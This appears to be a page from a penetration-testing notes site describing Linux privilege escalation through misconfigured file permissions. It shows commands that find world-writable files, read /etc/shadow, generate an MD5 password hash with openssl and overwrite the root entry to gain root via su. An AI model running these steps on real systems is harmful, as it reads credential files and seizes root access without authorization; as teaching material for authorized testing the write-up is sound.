Misconfigured Permissions Files

Some files permissions are not set properly, use them to elevate privileges.

Local Enumeration

Misconfigured Permissions Files

Look for world writable files
- Find a file that could help to elevate privileges

find / -not -type l -perm -o+w

❗ /etc/shadow is writable by everyone!

ls -l /etc/shadow
cat /etc/shadow

# "root" user doesn't have a password specified

Privilege Escalation

/etc/shadow stores the passwords in an encrypted format, so the root password need to be replaced with a hashed password

# Generate a password entry
openssl passwd -1 -salt abc password123
	$1$abc$UWUoROXzUCsLsVzI0R2et.

# Edit and paste the hashed password into the /etc/shadow file
vim /etc/shadow

Switch to the root user

su
# type "password123" password for "root" user

Previouschkrootkit 0.49 NextMisconfigured SUDO Privileges

Last updated 1 year ago